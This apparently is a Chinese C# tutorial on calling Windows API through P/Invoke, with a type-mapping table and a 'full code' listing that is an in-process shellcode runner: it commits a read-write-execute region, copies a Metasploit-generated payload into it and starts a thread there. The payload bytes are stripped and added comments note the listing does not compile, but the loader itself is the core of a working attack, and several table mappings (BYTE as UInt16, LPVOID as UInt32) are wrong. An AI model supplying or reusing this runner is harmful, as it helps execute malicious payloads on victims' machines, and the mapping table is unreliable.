c# 調用Windows API

c# 調用Windows API

前言

看點代碼安撫浮躁的心

對應表

Windows API 數據類型 對應的 C#/.NET 數據類型
BOOL System.Int32
BOOLEAN System.Int32
BYTE System.UInt16
COLORREF System.UInt32
DWORD System.UInt32
DWORD32 System.UInt32
DWORD64 System.UInt64
FLOAT System.Float
HACCEL System.IntPtr
HANDLE System.IntPtr
HBITMAP System.IntPtr
HBRUSH System.IntPtr
HCONV System.IntPtr
HCONVLIST System.IntPtr
HCURSOR System.IntPtr
HDC System.IntPtr
HDDEDATA System.IntPtr
HDESK System.IntPtr
HDROP System.IntPtr
HDWP System.IntPtr
HENHMETAFILE System.IntPtr
HFILE System.IntPtr
HFONT System.IntPtr
HGDIOBJ System.IntPtr
HGLOBAL System.IntPtr
HHOOK System.IntPtr
HICON System.IntPtr
HIMAGELIST System.IntPtr
HIMC System.IntPtr
HINSTANCE System.IntPtr
HKEY System.IntPtr
HLOCAL System.IntPtr
HMENU System.IntPtr
HMETAFILE System.IntPtr
HMODULE System.IntPtr
HMONITOR System.IntPtr
HPALETTE System.IntPtr
HPEN System.IntPtr
HRGN System.IntPtr
HRSRC System.IntPtr
HSZ System.IntPtr
HWINSTA System.IntPtr
HWND System.IntPtr
INT System.Int32
INT32 System.Int32
INT64 System.Int64
LONG System.Int32
LONG32 System.Int32
LONG64 System.Int64
LONGLONG System.Int64
LPARAM System.IntPtr
LPBOOL System.Int16[]
LPBYTE System.UInt16[]
LPCOLORREF System.UInt32[]
LPCSTR System.String
LPCTSTR System.String
LPCVOID System.UInt32
LPCWSTR System.String
LPDWORD System.UInt32[]
LPHANDLE System.UInt32
LPINT System.Int32[]
LPLONG System.Int32[]
LPSTR System.String
LPTSTR System.String
LPVOID System.UInt32
LPWORD System.Int32[]
LPWSTR System.String
LRESULT System.IntPtr
PBOOL System.Int16[]
PBOOLEAN System.Int16[]
PBYTE System.UInt16[]
PCHAR System.Char[]
PCSTR System.String
PCTSTR System.String
PCWCH System.UInt32
PCWSTR System.UInt32
PDWORD System.Int32[]
PFLOAT System.Float[]
PHANDLE System.UInt32
PHKEY System.UInt32
PINT System.Int32[]
PLCID System.UInt32
PLONG System.Int32[]
PLUID System.UInt32
PSHORT System.Int16[]
PSTR System.String
PTBYTE System.Char[]
PTCHAR System.Char[]
PTSTR System.String
PUCHAR System.Char[]
PUINT System.UInt32[]
PULONG System.UInt32[]
PUSHORT System.UInt16[]
PVOID System.UInt32
PWCHAR System.Char[]
PWORD System.Int16[]
PWSTR System.String
REGSAM System.UInt32
SC_HANDLE System.IntPtr
SC_LOCK System.IntPtr
SHORT System.Int16
SIZE_T System.UInt32
SSIZE_ System.UInt32
TBYTE System.Char
TCHAR System.Char
UCHAR System.Byte
UINT System.UInt32
UINT32 System.UInt32
UINT64 System.UInt64
ULONG System.UInt32
ULONG32 System.UInt32
ULONG64 System.UInt64
ULONGLONG System.UInt64
USHORT System.UInt16
WORD System.UInt16
WPARAM System.IntPtr
LPTHREAD_START_ROUTINE UInt32
LPSECURITY_ATTRIBUTES LPSECURITY_ATTRIBUTES

案例1

/// <summary>
/// P/Invoke binding for kernel32!VirtualAlloc. Every parameter and the return
/// value are declared as 32-bit integers even though lpAddress and the result
/// are pointer-sized in Win32, so this signature only round-trips addresses in
/// a 32-bit process (the table above lists LPVOID as UInt32 on the same basis).
/// </summary>
[DllImport("kernel32", EntryPoint = "VirtualAlloc")] // import the VirtualAlloc function from kernel32.dll
public static extern UInt32 VirtualAlloc(UInt32 lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect);// declaration of the Win32 API function

...
// Call site. The two magic numbers are Win32 flags: 0x00001000 = MEM_COMMIT,
// 0x40 = PAGE_EXECUTE_READWRITE, i.e. the region is requested writable AND executable.
 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 0x00001000, 0x40);

//或者可以寫成這樣

  // Named equivalents of the two magic numbers used above (values as defined in the Win32 headers).
  private static UInt32 MEM_COMMIT = 0x1000;
  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

  // Same call as above, now self-describing: commit an RWX region the size of the payload.
  UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);

extern 修飾符用於聲明在外部實現的方法。 extern 修飾符的常見用法是在使用 Interop 服務調入非託管代碼時與 DllImport 特性一起使用。在這種情況下,還必須將方法聲明爲 static

完整代碼

    /// <summary>
    /// Entry point. Runs an embedded byte array as native code inside the current
    /// process: commit a writable+executable region, copy the bytes into it, start a
    /// thread at that address and block until it exits. This allocate/copy/thread
    /// sequence on a PAGE_EXECUTE_READWRITE region is the textbook in-process
    /// shellcode runner and is a pattern endpoint defenses commonly monitor.
    /// </summary>
    static void Main(string[] args)
        {
            // native function's compiled code
            // generated with metasploit
            // NOTE(review): an explicit size with an empty initializer does not compile
            // (the initializer must supply exactly 892 elements); the payload bytes were
            // stripped from this listing.
            byte[] shellcode = new byte[892] {  };
           
            
            
            //UInt32 funcAddr=   VirtualAlloc(0, (uint)shellcode.Length,);
            //CreateThread(0,0, funcAddr,);
      
            // Commit an RWX region the size of the payload. The address comes back as a
            // UInt32, so this assumes a 32-bit process; the result is never checked for 0
            // (allocation failure), so a failed allocation is followed by a copy to address 0.
            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            // Copy the managed bytes into the unmanaged region.
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data: lpParameter for the new thread; nothing is passed
            IntPtr pinfo = IntPtr.Zero;
            // execute native code: the thread's start address is the RWX buffer itself
            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
            // 0xFFFFFFFF == INFINITE: block until the thread exits. hThread is never closed
            // (CloseHandle is declared but unused) and the region is never freed (VirtualFree
            // is declared but unused).
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
        // Win32 allocation/protection constants (values as defined in winnt.h), kept as
        // mutable static fields rather than const as originally written.
        private static UInt32 MEM_COMMIT = 0x1000;           // commit physical storage for the pages
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; // read + write + execute: an RWX region
        /// <summary>
        /// Binds kernel32!VirtualAlloc. lpStartAddr and the return value are pointer-sized
        /// in Win32 but declared as 32-bit integers here, so this binding is only correct
        /// in a 32-bit process.
        /// </summary>
        /// <param name="lpStartAddr">Desired base address, or 0 to let the system choose.</param>
        /// <param name="size">Region size in bytes.</param>
        /// <param name="flAllocationType">MEM_* allocation flags.</param>
        /// <param name="flProtect">PAGE_* memory protection.</param>
        /// <returns>Base address of the region as a 32-bit value, or 0 on failure.</returns>
        [DllImport("kernel32")]
        private static extern uint VirtualAlloc(uint lpStartAddr, uint size, uint flAllocationType, uint flProtect);
        /// <summary>
        /// Binds kernel32!VirtualFree. Declared but never called by <c>Main</c>, so the
        /// region allocated there is never released.
        /// </summary>
        /// <param name="lpAddress">Base address of the region to decommit or release.</param>
        /// <param name="dwSize">Size in bytes; must be 0 when releasing the whole reservation.</param>
        /// <param name="dwFreeType">MEM_DECOMMIT or MEM_RELEASE.</param>
        /// <returns>True on success.</returns>
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, uint dwSize, uint dwFreeType);
        /// <summary>
        /// Binds kernel32!CreateThread. lpThreadAttributes and lpStartAddress are
        /// pointer-sized in Win32 but declared as 32-bit integers here, consistent with the
        /// 32-bit-only VirtualAlloc binding in this class.
        /// </summary>
        /// <param name="lpThreadAttributes">Security attributes pointer; 0 for defaults.</param>
        /// <param name="dwStackSize">Initial stack size; 0 for the executable's default.</param>
        /// <param name="lpStartAddress">Address the new thread starts executing at.</param>
        /// <param name="param">Argument handed to the thread routine.</param>
        /// <param name="dwCreationFlags">Creation flags; 0 runs immediately.</param>
        /// <param name="lpThreadId">Receives the new thread's identifier.</param>
        /// <returns>Thread handle, or IntPtr.Zero on failure; the caller owns it and should close it.</returns>
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(uint lpThreadAttributes, uint dwStackSize, uint lpStartAddress, IntPtr param, uint dwCreationFlags, ref uint lpThreadId);
        /// <summary>
        /// Binds kernel32!CloseHandle. Declared but never called by <c>Main</c>, which
        /// therefore leaks the handle returned by CreateThread.
        /// </summary>
        /// <param name="handle">Kernel object handle to close.</param>
        /// <returns>True on success.</returns>
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        /// <summary>
        /// Binds kernel32!WaitForSingleObject: blocks until the handle is signalled or the
        /// timeout elapses.
        /// </summary>
        /// <param name="hHandle">Waitable kernel object (here, a thread handle).</param>
        /// <param name="dwMilliseconds">Timeout in milliseconds; 0xFFFFFFFF (INFINITE) waits forever.</param>
        /// <returns>WAIT_OBJECT_0 (0) when signalled, WAIT_TIMEOUT (0x102) on timeout, or WAIT_FAILED (0xFFFFFFFF).</returns>
        [DllImport("kernel32")]
        private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
        /// <summary>
        /// Binds kernel32!GetModuleHandle. No CharSet is given, so the ANSI entry point
        /// (GetModuleHandleA) is used. Not called in this listing.
        /// </summary>
        /// <param name="moduleName">Module name, or null for the calling process's image.</param>
        /// <returns>Module handle, or IntPtr.Zero if the module is not loaded.</returns>
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(string moduleName);
        /// <summary>
        /// Binds kernel32!GetProcAddress. The Win32 function returns a pointer, but this
        /// declaration narrows it to a 32-bit value, so it is only usable in a 32-bit
        /// process. Not called in this listing.
        /// </summary>
        /// <param name="hModule">Handle of the loaded module.</param>
        /// <param name="procName">Exported function name (ANSI).</param>
        /// <returns>Address of the export as a 32-bit value, or 0 if not found.</returns>
        [DllImport("kernel32")]
        private static extern uint GetProcAddress(IntPtr hModule, string procName);
        /// <summary>
        /// Binds kernel32!LoadLibrary (ANSI entry point, since no CharSet is given). The
        /// HMODULE it returns is pointer-sized but declared as a 32-bit value here, so this
        /// binding is only correct in a 32-bit process. Not called in this listing.
        /// </summary>
        /// <param name="lpFileName">Path or name of the module to load.</param>
        /// <returns>Module handle as a 32-bit value, or 0 on failure.</returns>
        [DllImport("kernel32")]
        private static extern uint LoadLibrary(string lpFileName);
        /// <summary>
        /// Binds kernel32!GetLastError. Not called in this listing. Documented caveat: the
        /// runtime may overwrite the thread's last-error value between a P/Invoke call and
        /// this call, so the supported way to read it is <c>SetLastError = true</c> on the
        /// DllImport attribute followed by <c>Marshal.GetLastWin32Error()</c>.
        /// </summary>
        /// <returns>The calling thread's last-error code.</returns>
        [DllImport("kernel32")]
        private static extern uint GetLastError();
  }

}